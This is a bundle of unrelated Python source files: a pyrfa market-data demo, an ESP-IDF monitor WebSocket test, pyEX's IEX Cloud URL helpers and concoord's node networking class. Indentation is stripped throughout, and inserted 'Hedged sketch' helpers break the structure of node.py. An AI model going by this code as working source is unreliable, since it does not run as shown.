IMAGES += {'RIC':'JPY=', 'RDNDISPLAY':200, 'RDN_EXCHID':'NAS', 'OFFCL_CODE':'isin1234XYZ', 'BID':4.23, 'DIVPAYDATE':'20110623', 'OPEN_TIME':'09:00:01.000'},
p.marketPriceSubmit(IMAGES)
vol = 1000
while True:
time.sleep(1)
vol += 1
price = round(4 + random.random(), 3)
UPDATES = {'RIC':'EUR=', 'ACVOL_1':vol, 'TRDPRC_1':price},
UPDATES += {'RIC':'JPY=', 'BID_NET_CH':0.0041, 'BID':0.988, 'ASK':0.999,'ASK_TIME':'now'},
p.marketPriceSubmit(UPDATES)
except:
pass
def subscribe():
try:
try:
p = pyrfa.Pyrfa()
p.createConfigDb("./pyrfa.cfg")
p.acquireSession("Session3")
p.createOMMConsumer()
p.login()
p.directoryRequest()
p.dictionaryRequest()
p.marketPriceRequest("EUR=,JPY=")
while True:
time.sleep(0.01)
for u in p.dispatchEventQueue():
print("\n" + u['SERVICE'] + " - " + u['RIC'])
for k,v in u.items():
print("%15s %g" % (k,v) if type(v) is float else "%15s %s" % (k,v))
finally:
p.marketPriceCloseAllRequest()
except:
pass
if __name__ == "__main__":
try:
try:
t_publish = multiprocessing.Process(target=publish)
t_publish.start()
#wait 10s until the service is up
time.sleep(10)
t_subscribe = multiprocessing.Process(target=subscribe)
t_subscribe.start()
while True:
time.sleep(0.01)
finally:
time.sleep(1)
for process in multiprocessing.active_children():
process.terminate()
except:
pass
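# Hedged sketch (standard library only, not part of pyrfa): instead of sleeping
# a fixed 10s before subscribing, the same orchestration can use a
# multiprocessing.Event. It assumes a modified publish function that accepts the
# Event and calls ready.set() once the initial images have been submitted.
import multiprocessing
import time

def _run_pair(publish_fn, subscribe_fn):
    ready = multiprocessing.Event()
    publisher = multiprocessing.Process(target=publish_fn, args=(ready,))
    publisher.start()
    ready.wait(timeout=30)  # publisher signals once the service is up
    subscriber = multiprocessing.Process(target=subscribe_fn)
    subscriber.start()
    try:
        while True:
            time.sleep(0.1)
    finally:
        for proc in (publisher, subscriber):
            proc.terminate()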
|
app_test.py
|
from __future__ import unicode_literals
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from tiny_test_fw import Utility
import glob
import json
import os
import re
import threading
import ttfw_idf
class IDEWSProtocol(WebSocket):
def handleMessage(self):
try:
j = json.loads(self.data)
except Exception as e:
Utility.console_log('Server ignores error: {}'.format(e), 'orange')
return
event = j.get('event')
if event and 'prog' in j and ((event == 'gdb_stub' and 'port' in j) or
(event == 'coredump' and 'file' in j)):
payload = {'event': 'debug_finished'}
self.sendMessage(json.dumps(payload))
Utility.console_log('Server sent: {}'.format(payload))
else:
Utility.console_log('Server received: {}'.format(j), 'orange')
def handleConnected(self):
Utility.console_log('{} connected to server'.format(self.address))
def handleClose(self):
Utility.console_log('{} closed the connection'.format(self.address))
class WebSocketServer(object):
HOST = '127.0.0.1'
PORT = 1123
def run(self):
server = SimpleWebSocketServer(self.HOST, self.PORT, IDEWSProtocol)
while not self.exit_event.is_set():
server.serveonce()
def __init__(self):
self.exit_event = threading.Event()
self.thread = threading.Thread(target=self.run)
self.thread.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.exit_event.set()
self.thread.join(10)
if self.thread.is_alive():
Utility.console_log('Thread cannot be joined', 'orange')
@ttfw_idf.idf_custom_test(env_tag='test_jtag_arm', group='test-apps')
def test_monitor_ide_integration(env, extra_data):
config_files = glob.glob(os.path.join(os.path.dirname(__file__), 'sdkconfig.ci.*'))
config_names = [os.path.basename(s).replace('sdkconfig.ci.', '') for s in config_files]
rel_proj_path = 'tools/test_apps/system/monitor_ide_integration'
for name in config_names:
Utility.console_log('Checking config "{}"... '.format(name), 'green', end='')
dut = env.get_dut('panic', rel_proj_path, app_config_name=name)
monitor_path = os.path.join(dut.app.idf_path, 'tools/idf_monitor.py')
elf_path = os.path.join(dut.app.binary_path, 'panic.elf')
dut.start_app()
# Closing the DUT because we will reconnect with IDF Monitor
env.close_dut(dut.name)
with WebSocketServer(), ttfw_idf.CustomProcess(' '.join([monitor_path,
elf_path,
'--ws', 'ws://{}:{}'.format(WebSocketServer.HOST,
WebSocketServer.PORT)]),
logfile='monitor_{}.log'.format(name)) as p:
p.pexpect_proc.expect(re.compile(r'Guru Meditation Error'), timeout=10)
p.pexpect_proc.expect_exact('Communicating through WebSocket', timeout=5)
# "u?" is for Python 2 only in the following regular expressions.
# The elements of dictionary can be printed in different order depending on the Python version.
p.pexpect_proc.expect(re.compile(r"WebSocket sent: \{u?.*'event': u?'" + name + "'"), timeout=5)
p.pexpect_proc.expect_exact('Waiting for debug finished event', timeout=5)
p.pexpect_proc.expect(re.compile(r"WebSocket received: \{u?'event': u?'debug_finished'\}"), timeout=5)
p.pexpect_proc.expect_exact('Communications through WebSocket is finished', timeout=5)
if __name__ == '__main__':
test_monitor_ide_integration()
|
urls.py
|
# *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from __future__ import print_function
import json
import os
import os.path
from threading import Event, Thread
from urllib.parse import urlparse
import requests
from socketIO_client_nexus import BaseNamespace, SocketIO
from sseclient import SSEClient
from .exception import PyEXception, PyEXStopSSE
_URL_PREFIX = "https://api.iextrading.com/1.0/"
_URL_PREFIX_CLOUD = "https://cloud.iexapis.com/{version}/"
_URL_PREFIX_CLOUD_ORIG = _URL_PREFIX_CLOUD
_URL_PREFIX_CLOUD_SANDBOX = "https://sandbox.iexapis.com/stable/"
_SIO_URL_PREFIX = "https://ws-api.iextrading.com"
_SIO_PORT = 443
_SSE_URL_PREFIX = (
"https://cloud-sse.iexapis.com/{version}/{channel}?symbols={symbols}&token={token}"
)
_SSE_URL_PREFIX_ORIG = _SSE_URL_PREFIX
_SSE_URL_PREFIX_ALL = "https://cloud-sse.iexapis.com/{version}/{channel}?token={token}"
_SSE_DEEP_URL_PREFIX = "https://cloud-sse.iexapis.com/{version}/deep?symbols={symbols}&channels={channels}&token={token}"
_SSE_URL_PREFIX_SANDBOX = (
"https://sandbox-sse.iexapis.com/stable/{channel}?symbols={symbols}&token={token}"
)
_SSE_URL_PREFIX_ALL_SANDBOX = (
"https://sandbox-sse.iexapis.com/stable/{channel}?token={token}"
)
_SSE_DEEP_URL_PREFIX_SANDBOX = "https://sandbox-sse.iexapis.com/stable/deep?symbols={symbols}&channels={channels}&token={token}"
_PYEX_PROXIES = None
def _get(url, token="", version="stable", filter="", format="json"):
"""for backwards compat, accepting token and version but ignoring"""
token = token or os.environ.get("IEX_TOKEN")
if token:
if version == "sandbox":
return _getIEXCloudSandbox(url, token, version, filter, format)
return _getIEXCloud(url, token, version, filter, format)
return _getOrig(url)
async def _getAsync(url, token="", version="stable", filter="", format="json"):
"""for backwards compat, accepting token and version but ignoring"""
token = token or os.environ.get("IEX_TOKEN")
if token:
if version == "sandbox":
return await _getIEXCloudSandboxAsync(url, token, version, filter, format)
return await _getIEXCloudAsync(url, token, version, filter, format)
return _getOrig(url)
def _post(
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
token = token or os.environ.get("IEX_TOKEN")
if version == "sandbox":
return _postIEXCloudSandbox(
url, data, json, token, version, token_in_params, format
)
return _postIEXCloud(url, data, json, token, version, token_in_params, format)
def _delete(url, token="", version="stable", format="json"):
token = token or os.environ.get("IEX_TOKEN")
if version == "sandbox":
return _deleteIEXCloudSandbox(url, token, version, format)
return _deleteIEXCloud(url, token, version, format)
def _getOrig(url):
raise PyEXception(
"Old IEX API is deprecated. For a free API token, sign up at https://iexcloud.io"
)
def _getIEXCloudBase(
base_url, url, token="", version="stable", filter="", format="json"
):
"""for iex cloud"""
url = base_url.format(version=version) + url
params = {"token": token}
if filter:
params["filter"] = filter
if format not in ("json", "binary") and isinstance(format, str):
params["format"] = format
resp = requests.get(urlparse(url).geturl(), proxies=_PYEX_PROXIES, params=params)
if resp.status_code == 200:
if format == "json":
return resp.json()
elif format == "binary":
return resp.content
return resp.text
raise PyEXception("Response %d - " % resp.status_code, resp.text)
def _getIEXCloud(url, token="", version="stable", filter="", format="json"):
"""for iex cloud"""
return _getIEXCloudBase(_URL_PREFIX_CLOUD, url, token, version, filter, format)
async def _getIEXCloudAsyncBase(
base_url, url, token="", version="stable", filter="", format="json"
):
"""for iex cloud"""
import aiohttp
url = base_url.format(version=version) + url
params = {"token": token}
if filter:
params["filter"] = filter
if format not in ("json", "binary"):
params["format"] = format
async with aiohttp.ClientSession() as session:
async with session.get(
urlparse(url).geturl(), proxy=_PYEX_PROXIES, params=params
) as resp:
if resp.status == 200:
if format == "json":
return await resp.json()
elif format == "binary":
return await resp.read()
return resp.text()
raise PyEXception("Response %d - " % resp.status, await resp.text())
async def _getIEXCloudAsync(url, token="", version="stable", filter="", format="json"):
"""for iex cloud"""
return await _getIEXCloudAsyncBase(
_URL_PREFIX_CLOUD, url, token, version, filter, format
)
def _getIEXCloudSandbox(url, token="", version="stable", filter="", format="json"):
"""for iex cloud"""
return _getIEXCloudBase(
_URL_PREFIX_CLOUD_SANDBOX, url, token, "stable", filter, format
)
async def _getIEXCloudSandboxAsync(
url, token="", version="stable", filter="", format="json"
):
"""for iex cloud"""
return await _getIEXCloudAsyncBase(
_URL_PREFIX_CLOUD_SANDBOX, url, token, "stable", filter, format
)
def _postIEXCloudBase(
base_url,
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
"""for iex cloud"""
url = base_url.format(version=version) + url
if token_in_params:
params = {"token": token}
else:
params = {}
if format != "json":
params["format"] = format
resp = requests.post(
urlparse(url).geturl(),
data=data,
json=json,
proxies=_PYEX_PROXIES,
params=params,
)
if resp.status_code == 200:
if format == "json":
return resp.json()
return resp.text
raise PyEXception("Response %d - " % resp.status_code, resp.text)
def _postIEXCloud(
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
"""for iex cloud"""
return _postIEXCloudBase(
_URL_PREFIX_CLOUD, url, data, json, token, version, token_in_params, format
)
async def _postIEXCloudAsyncBase(
base_url,
url,
data=None,
json=None,
token="",
version="stable",
filter="",
token_in_params=True,
format="json",
):
"""for iex cloud"""
import aiohttp
url = base_url.format(version=version) + url
if token_in_params:
params = {"token": token}
else:
params = {}
if format != "json":
params["format"] = format
async with aiohttp.ClientSession() as session:
async with session.post(
urlparse(url).geturl(),
data=data,
json=json,
proxy=_PYEX_PROXIES,
params=params,
) as resp:
if resp.status == 200:
if format == "json":
return await resp.json()
return resp.text()
raise PyEXception("Response %d - " % resp.status, await resp.text())
async def _postIEXCloudAsync(
url,
data=None,
json=None,
token="",
version="stable",
filter="",
token_in_params=True,
format="json",
):
"""for iex cloud"""
return await _postIEXCloudAsyncBase(
_URL_PREFIX_CLOUD,
url,
data,
json,
token,
version,
filter,
token_in_params,
format,
)
def _postIEXCloudSandbox(
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
"""for iex cloud"""
return _postIEXCloudBase(
_URL_PREFIX_CLOUD_SANDBOX,
url,
data,
json,
token,
"stable",
token_in_params,
format,
)
def _deleteIEXCloudBase(base_url, url, token="", version="stable", format="json"):
"""for iex cloud"""
url = base_url.format(version=version) + url
params = {"token": token}
if format != "json":
params["format"] = format
resp = requests.delete(urlparse(url).geturl(), proxies=_PYEX_PROXIES, params=params)
if resp.status_code == 200:
if format == "json":
return resp.json()
return resp.text
raise PyEXception("Response %d - " % resp.status_code, resp.text)
def _deleteIEXCloud(url, token="", version="stable", format="json"):
"""for iex cloud"""
return _deleteIEXCloudBase(_URL_PREFIX_CLOUD, url, token, version, format)
async def _deleteIEXCloudAsyncBase(base_url, url, token="", version="stable", format="json"):
"""for iex cloud"""
import aiohttp
url = base_url.format(version=version) + url
params = {"token": token}
if format != "json":
params["format"] = format
async with aiohttp.ClientSession() as session:
async with session.delete(
urlparse(url).geturl(), proxy=_PYEX_PROXIES, params=params
) as resp:
if resp.status == 200:
if format == "json":
return await resp.json()
return resp.text()
raise PyEXception("Response %d - " % resp.status, await resp.text())
async def _deleteIEXCloudAsync(url, token="", version="stable", format="json"):
"""for iex cloud"""
return await _deleteIEXCloudAsyncBase(
_URL_PREFIX_CLOUD, url, token, version, format
)
def _deleteIEXCloudSandbox(url, token="", version="stable", format="json"):
"""for iex cloud"""
return _deleteIEXCloudBase(_URL_PREFIX_CLOUD_SANDBOX, url, token, "stable", format)
def _wsURL(url):
"""internal"""
return "/1.0/" + url
def _tryJson(data, raw=True):
"""internal"""
if raw:
return data
try:
return json.loads(data)
except ValueError:
return data
class WSClient(object):
def __init__(
self, addr, sendinit=None, on_data=None, on_open=None, on_close=None, raw=True
):
"""
addr: path to sio
sendinit: tuple to emit
on_data, on_open, on_close: functions to call
"""
self.addr = addr
self.sendinit = sendinit
on_data = on_data or print
class Namespace(BaseNamespace):
def on_connect(self, *data):
if on_open:
on_open(_tryJson(data, raw))
def on_disconnect(self, *data):
if on_close:
on_close(_tryJson(data, raw))
def on_message(self, data):
on_data(_tryJson(data, raw))
self._Namespace = Namespace
def run(self):
self.socketIO = SocketIO(_SIO_URL_PREFIX, _SIO_PORT)
self.namespace = self.socketIO.define(self._Namespace, self.addr)
if self.sendinit:
self.namespace.emit(*self.sendinit)
self.socketIO.wait()
def _stream(url, sendinit=None, on_data=print):
"""internal"""
cl = WSClient(url, sendinit=sendinit, on_data=on_data)
return cl
def _streamSSE(url, on_data=print, exit=None):
"""internal"""
messages = SSEClient(url, proxies=_PYEX_PROXIES, headers={"keep_alive": "false"})
def _runner(messages=messages, on_data=on_data):
for msg in messages:
data = msg.data
try:
on_data(json.loads(data))
except PyEXStopSSE:
# stop listening and return
print("HERE3")
return
except (json.JSONDecodeError, KeyboardInterrupt):
print("HERE4")
raise
except Exception:
print("HERE5")
raise
def _exit(messages=messages, exit=exit):
# run runner in wrapper
runthread = Thread(target=_runner)
# die with parent
runthread.daemon = True
# start the runner
runthread.start()
# wait for exit event
exit.wait()
# kill
killerthread = Thread(target=lambda: messages.resp.close())
# die with parent
killerthread.daemon = True
# start the killer
killerthread.start()
return
if isinstance(exit, Event):
# run on thread, stop when exit set
exitthread = Thread(target=_exit)
# start the threads
exitthread.start()
# return the threads
return exitthread
else:
# just call and return the function
return _runner()
async def _streamSSEAsync(url, exit=None):
"""internal"""
from asyncio import Event
from aiohttp_sse_client import client as sse_client
from aiostream.stream import merge
async with sse_client.EventSource(url) as event_source:
if isinstance(exit, Event):
async def _waitExit():
yield await exit.wait()
waits = (_waitExit(), event_source)
else:
waits = (event_source,)
try:
async with merge(*waits).stream() as stream:
try:
async for event in stream:
if event == True: # noqa: E712
return
yield json.loads(event.data)
except ConnectionError:
raise PyEXception("Could not connect to SSE Stream")
except PyEXStopSSE:
return
except BaseException:
raise
except (json.JSONDecodeError, KeyboardInterrupt):
raise
def setProxy(proxies=None):
"""Set proxies argument for requests
Args:
proxies (dict): Proxies to set
"""
global _PYEX_PROXIES
_PYEX_PROXIES = proxies
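# Hedged usage example: route all pyEX requests through a local proxy.
# Any dict accepted by the `requests` library's `proxies` argument works.
# setProxy({"https": "http://127.0.0.1:8080"})
# setProxy()  # reset to no proxy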
def overrideUrl(url="", env=""):
"""Override the default IEX Cloud url"""
global _URL_PREFIX_CLOUD
if env:
_URL_PREFIX_CLOUD = "https://cloud.{env}.iexapis.com/{{version}}/".format(
env=env
)
elif url:
_URL_PREFIX_CLOUD = url
else:
# reset
_URL_PREFIX_CLOUD = _URL_PREFIX_CLOUD_ORIG
def overrideSSEUrl(url="", env=""):
"""Override the default IEX Cloud SSE url"""
global _SSE_URL_PREFIX
if env:
_SSE_URL_PREFIX = "https://cloud-sse.{env}.iexapis.com/{{version}}/{{channel}}?symbols={{symbols}}&token={{token}}".format(
env=env
)
elif url:
_SSE_URL_PREFIX = url
else:
# reset
_SSE_URL_PREFIX = _SSE_URL_PREFIX_ORIG
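# Hedged usage examples for the override helpers above:
# overrideUrl(env="beta")   # -> https://cloud.beta.iexapis.com/{version}/
# overrideUrl(url="https://example.test/{version}/")  # hypothetical custom gateway
# overrideUrl()             # reset to the default IEX Cloud prefix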
|
node.py
|
'''
@author: Deniz Altinbuken, Emin Gun Sirer
@note: Master class for all nodes
@copyright: See LICENSE
'''
import argparse
import os, sys
import random, struct
import cPickle as pickle
import time, socket, select
from Queue import Queue
from threading import Thread, RLock, Lock, Condition, Timer, Semaphore
from concoord.enums import *
from concoord.nameserver import Nameserver
from concoord.exception import ConnectionError
from concoord.utils import *
from concoord.message import *
from concoord.pack import *
from concoord.pvalue import PValueSet
from concoord.connection import ConnectionPool, Connection, SelfConnection
try:
import dns.resolver, dns.exception
except:
print("Install dnspython: http://www.dnspython.org/")
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--addr", action="store", dest="addr",
help="address for the node")
parser.add_argument("-p", "--port", action="store", dest="port", type=int,
help="port for the node")
parser.add_argument("-b", "--boot", action="store", dest="bootstrap",
help="address:port tuple for the bootstrap peer")
parser.add_argument("-o", "--objectname", action="store", dest="objectname", default='',
help="client object dotted name")
parser.add_argument("-l", "--logger", action="store", dest="logger", default='',
help="logger address")
parser.add_argument("-n", "--domainname", action="store", dest="domain", default='',
help="domain name that the nameserver will accept queries for")
parser.add_argument("-r", "--route53", action="store_true", dest="route53", default=False,
help="use Route53 (requires a Route53 zone)")
parser.add_argument("-w", "--writetodisk", action="store_true", dest="writetodisk", default=False,
help="writing to disk on/off")
parser.add_argument("-d", "--debug", action="store_true", dest="debug", default=False,
help="debug on/off")
args = parser.parse_args()
class Node():
"""Node encloses the basic Node behaviour and state that
are extended by Replicas and Nameservers.
"""
def __init__(self,
addr=args.addr,
port=args.port,
givenbootstraplist=args.bootstrap,
debugoption=args.debug,
objectname=args.objectname,
logger=args.logger,
writetodisk=args.writetodisk):
self.addr = addr if addr else findOwnIP()
self.port = port
self.debug = debugoption
self.durable = writetodisk
self.isnameserver = args.domain != ''
self.domain = args.domain
self.useroute53 = args.route53
if objectname == '':
parser.print_help()
self._graceexit(1)
self.objectname = objectname
# initialize receive queue
self.receivedmessages_semaphore = Semaphore(0)
self.receivedmessages = []
# lock to synchronize message handling
self.lock = Lock()
# create server socket and bind to a port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.setblocking(0)
if self.port:
try:
self.socket.bind((self.addr,self.port))
except socket.error as e:
print "Cannot bind to port %d" % self.port
print "Socket Error: ", e
self._graceexit(1)
else:
for i in range(50):
self.port = random.randint(14000,15000)
try:
self.socket.bind((self.addr,self.port))
break
except socket.error as e:
print "Socket Error: ", e
self.socket.listen(10)
self.connectionpool = ConnectionPool()
try:
self.connectionpool.epoll = select.epoll()
except AttributeError as e:
# the os doesn't support epoll
self.connectionpool.epoll = None
# set the logger
if logger:
LOGGERNODE = logger
else:
LOGGERNODE = None
# Initialize replicas
# Keeps {peer:outofreachcount}
self.replicas = {}
# Nameserver state
if self.isnameserver:
self.type = NODE_NAMESERVER
try:
self.nameserver = Nameserver(self.addr, self.domain, self.useroute53,
self.replicas, self.debug)
except Exception as e:
print "Error:", e
print "Could not start Replica as a Nameserver, exiting."
self._graceexit(1)
else:
self.type = NODE_REPLICA
self.alive = True
self.me = Peer(self.addr,self.port,self.type)
# set id
self.id = '%s:%d' % (self.addr, self.port)
# add self to connectionpool
self.connectionpool.add_connection_to_self(self.me,
SelfConnection(self.receivedmessages,
self.receivedmessages_semaphore))
self.logger = Logger("%s-%s" % (node_names[self.type],self.id), lognode=LOGGERNODE)
if self.isnameserver:
self.nameserver.add_logger(self.logger)
print "%s-%s connected." % (node_names[self.type],self.id)
# Keeps the liveness of the nodes
self.nodeliveness = {}
self.bootstrapset = set()
# connect to the bootstrap node
if givenbootstraplist:
self.discoverbootstrap(givenbootstraplist)
self.connecttobootstrap()
self.stateuptodate = False
def _getipportpairs(self, bootaddr, bootport):
for node in socket.getaddrinfo(bootaddr, bootport, socket.AF_INET, socket.SOCK_STREAM):
yield Peer(node[4][0],bootport,NODE_REPLICA)
def discoverbootstrap(self, givenbootstraplist):
bootstrapstrlist = givenbootstraplist.split(",")
for bootstrap in bootstrapstrlist:
#ipaddr:port pair given as bootstrap
if bootstrap.find(":") >= 0:
bootaddr,bootport = bootstrap.split(":")
for peer in self._getipportpairs(bootaddr, int(bootport)):
self.bootstrapset.add(peer)
#dnsname given as bootstrap
else:
answers = []
try:
answers = dns.resolver.query('_concoord._tcp.'+bootstrap, 'SRV')
except (dns.resolver.NXDOMAIN, dns.exception.Timeout):
if self.debug: self.logger.write("DNS Error", "Cannot resolve %s" % str(bootstrap))
for rdata in answers:
for peer in self._getipportpairs(str(rdata.target), rdata.port):
self.bootstrapset.add(peer)
def connecttobootstrap(self):
tries = 0
keeptrying = True
while tries < BOOTSTRAPCONNECTTIMEOUT and keeptrying:
for bootpeer in self.bootstrapset:
try:
if self.debug: self.logger.write("State",
"trying to connect to bootstrap: %s" % str(bootpeer))
helomessage = create_message(MSG_HELO, self.me)
successid = self.send(helomessage, peer=bootpeer)
if successid < 0:
tries += 1
continue
keeptrying = False
break
except socket.error as e:
if self.debug: self.logger.write("Socket Error",
"cannot connect to bootstrap: %s" % str(e))
tries += 1
continue
time.sleep(1)
def startservice(self):
# Start a thread that waits for inputs
receiver_thread = Thread(target=self.server_loop, name='ReceiverThread')
receiver_thread.start()
# Start a thread with the server which will start a thread for each request
main_thread = Thread(target=self.handle_messages, name='MainThread')
main_thread.start()
# Start a thread that pings all neighbors
ping_thread = Timer(LIVENESSTIMEOUT, self.ping_neighbor)
ping_thread.name = 'PingThread'
ping_thread.start()
# Start a thread that goes through the nascentset and cleans expired ones
nascent_thread = Timer(NASCENTTIMEOUT, self.clean_nascent)
nascent_thread.name = 'NascentThread'
nascent_thread.start()
# Start a thread that waits for inputs
if self.debug:
input_thread = Thread(target=self.get_user_input_from_shell, name='InputThread')
input_thread.start()
return self
def __str__(self):
return "%s NODE %s:%d" % (node_names[self.type], self.addr, self.port)
def statestr(self):
returnstr = ""
for peer in self.replicas:
returnstr += node_names[peer.type] + " %s:%d\n" % (peer.addr,peer.port)
if hasattr(self, 'pendingcommands') and len(self.pendingcommands) > 0:
pending = "".join("%d: %s" % (cno, proposal) for cno,proposal \
in self.pendingcommands.iteritems())
returnstr = "%s\nPending:\n%s" % (returnstr, pending)
return returnstr
def ping_neighbor(self):
"""used to ping neighbors periodically"""
# Only ping neighbors that didn't send a message recently
while True:
# Check nodeliveness
for peer in self.replicas:
if peer == self.me:
continue
if peer in self.nodeliveness:
nosound = time.time() - self.nodeliveness[peer]
else:
nosound = LIVENESSTIMEOUT + 1
if nosound <= LIVENESSTIMEOUT:
# Peer is alive
self.replicas[peer] = 0
continue
if nosound > LIVENESSTIMEOUT:
# Send PING to node
if self.debug: self.logger.write("State", "Sending PING to %s" % str(peer))
pingmessage = create_message(MSG_PING, self.me)
successid = self.send(pingmessage, peer=peer)
if successid < 0 or nosound > (2*LIVENESSTIMEOUT):
# Neighbor not responding, mark the neighbor
if self.debug: self.logger.write("State",
"Neighbor not responding")
self.replicas[peer] += 1
time.sleep(LIVENESSTIMEOUT)
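# Hedged sketch of the liveness rule applied above: a peer is pinged only when
# nothing has been heard from it for more than LIVENESSTIMEOUT seconds.
def _peers_to_ping(replicas, nodeliveness, me, livenesstimeout, now):
    # Return the peers whose last message is older than the liveness timeout.
    stale = []
    for peer in replicas:
        if peer == me:
            continue
        last_heard = nodeliveness.get(peer, 0)
        if now - last_heard > livenesstimeout:
            stale.append(peer)
    return stale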
def clean_nascent(self):
lastnascentset = set([])
while True:
for sock in lastnascentset.intersection(self.connectionpool.nascentsockets):
# expired -- if it's not already in the set, it should be deleted
self.connectionpool.activesockets.remove(sock)
self.connectionpool.nascentsockets.remove(sock)
lastnascentset = self.connectionpool.nascentsockets
time.sleep(NASCENTTIMEOUT)
def server_loop(self):
"""Serverloop that listens to multiple connections and accepts new ones.
Server State
- inputready: sockets that are ready for reading
- exceptready: sockets that are ready according to an *exceptional condition*
"""
self.socket.listen(10)
if self.connectionpool.epoll:
self.connectionpool.epoll.register(self.socket.fileno(), select.EPOLLIN)
self.use_epoll()
else:
# the OS doesn't support epoll
self.connectionpool.activesockets.add(self.socket)
self.use_select()
self.socket.close()
return
def use_epoll(self):
while self.alive:
try:
events = self.connectionpool.epoll.poll(1)
for fileno, event in events:
if fileno == self.socket.fileno():
clientsock, clientaddr = self.socket.accept()
clientsock.setblocking(0)
self.connectionpool.epoll.register(clientsock.fileno(), select.EPOLLIN)
self.connectionpool.epollsockets[clientsock.fileno()] = clientsock
elif event & select.EPOLLIN:
success = self.handle_connection(self.connectionpool.epollsockets[fileno])
if not success:
self.connectionpool.epoll.unregister(fileno)
self.connectionpool.del_connection_by_socket(self.connectionpool.epollsockets[fileno])
self.connectionpool.epollsockets[fileno].close()
del self.connectionpool.epollsockets[fileno]
elif event & select.EPOLLHUP:
self.connectionpool.epoll.unregister(fileno)
self.connectionpool.epollsockets[fileno].close()
del self.connectionpool.epollsockets[fileno]
            except (KeyboardInterrupt, EOFError):
os._exit(0)
self.connectionpool.epoll.unregister(self.socket.fileno())
self.connectionpool.epoll.close()
def use_select(self):
while self.alive:
try:
inputready,outputready,exceptready = select.select(self.connectionpool.activesockets,
[],
self.connectionpool.activesockets,
1)
for s in exceptready:
if self.debug: self.logger.write("Exception", "%s" % s)
for s in inputready:
if s == self.socket:
clientsock,clientaddr = self.socket.accept()
if self.debug: self.logger.write("State",
"accepted a connection from address %s"
% str(clientaddr))
self.connectionpool.activesockets.add(clientsock)
self.connectionpool.nascentsockets.add(clientsock)
success = True
else:
success = self.handle_connection(s)
if not success:
self.connectionpool.del_connection_by_socket(s)
            except (KeyboardInterrupt, EOFError):
os._exit(0)
def handle_connection(self, clientsock):
"""Receives a message and calls the corresponding message handler"""
connection = self.connectionpool.get_connection_by_socket(clientsock)
try:
for message in connection.received_bytes():
if self.debug: self.logger.write("State", "received %s" % str(message))
if message.type == MSG_STATUS:
if self.debug: self.logger.write("State",
"Answering status message %s"
% self.__str__())
messagestr = pickle.dumps(self.__str__())
message = struct.pack("I", len(messagestr)) + messagestr
clientsock.send(message)
return False
# Update nodeliveness
if message.source.type != NODE_CLIENT:
self.nodeliveness[message.source] = time.time()
if message.source in self.replicas:
self.replicas[message.source] = 0
# add to receivedmessages
self.receivedmessages.append((message,connection))
self.receivedmessages_semaphore.release()
                if message.type in (MSG_CLIENTREQUEST, MSG_INCCLIENTREQUEST,
                                    MSG_HELO, MSG_HELOREPLY, MSG_UPDATE):
                    self.connectionpool.add_connection_to_peer(message.source, connection)
return True
except ConnectionError as e:
return False
def handle_messages(self):
while True:
self.receivedmessages_semaphore.acquire()
(message_to_process,connection) = self.receivedmessages.pop(0)
if message_to_process.type == MSG_CLIENTREQUEST:
if message_to_process.clientbatch:
self.process_message(message_to_process, connection)
continue
# check if there are other client requests waiting
msgconns = [(message_to_process,connection)]
for m,c in self.receivedmessages:
if m.type == MSG_CLIENTREQUEST:
# decrement the semaphore count
self.receivedmessages_semaphore.acquire()
# remove the m,c pair from receivedmessages
self.receivedmessages.remove((m,c))
msgconns.append((m,c))
if len(msgconns) > 1:
self.process_messagelist(msgconns)
else:
self.process_message(message_to_process, connection)
else:
self.process_message(message_to_process, connection)
return
def process_messagelist(self, msgconnlist):
"""Processes given message connection pairs"""
with self.lock:
self.msg_clientrequest_batch(msgconnlist)
return True
def process_message(self, message, connection):
"""Processes given message connection pair"""
# find method and invoke it holding a lock
mname = "msg_%s" % msg_names[message.type].lower()
try:
method = getattr(self, mname)
if self.debug: self.logger.write("State", "invoking method: %s" % mname)
except AttributeError:
if self.debug: self.logger.write("Method Error", "method not supported: %s" % mname)
return False
with self.lock:
method(connection, message)
return True
# message handlers
def msg_helo(self, conn, msg):
return
def msg_heloreply(self, conn, msg):
if msg.leader:
if msg.leader == self.me:
if self.debug: self.logger.write("State", "I'm the leader.")
return
else:
if self.debug: self.logger.write("State", "Adding new bootstrap.")
if msg.source in self.bootstrapset:
self.bootstrapset.remove(msg.source)
self.bootstrapset.add(msg.leader)
self.connecttobootstrap()
def msg_ping(self, conn, msg):
if self.debug: self.logger.write("State", "Replying to PING.")
pingreplymessage = create_message(MSG_PINGREPLY, self.me)
conn.send(pingreplymessage)
def msg_pingreply(self, conn, msg):
return
# shell commands generic to all nodes
def cmd_help(self, args):
"""prints the commands that are supported
by the corresponding Node."""
print "Commands supported:"
for attr in dir(self):
if attr.startswith("cmd_"):
print attr.replace("cmd_", "")
def cmd_exit(self, args):
"""Changes the liveness state and dies"""
self.alive = False
os._exit(0)
def cmd_state(self, args):
"""prints connectivity state of the corresponding Node."""
print "\n%s\n" % (self.statestr())
def get_user_input_from_shell(self):
"""Shell loop that accepts inputs from the command prompt and
calls corresponding command handlers."""
while self.alive:
try:
input = raw_input(">")
if len(input) == 0:
continue
else:
input = input.split()
mname = "cmd_%s" % input[0].lower()
try:
method = getattr(self, mname)
except AttributeError as e:
print "Command not supported: ", str(e)
continue
with self.lock:
method(input)
except KeyboardInterrupt:
os._exit(0)
except EOFError:
return
return
def send(self, message, peer=None, group=None):
if peer:
connection = self.connectionpool.get_connection_by_peer(peer)
if connection == None:
if self.debug: self.logger.write("Connection Error",
"Connection for %s cannot be found." % str(peer))
return -1
connection.send(message)
return message[FLD_ID]
elif group:
ids = []
for peer,liveness in group.iteritems():
connection = self.connectionpool.get_connection_by_peer(peer)
if connection == None:
if self.debug: self.logger.write("Connection Error",
"Connection for %s cannot be found." % str(peer))
continue
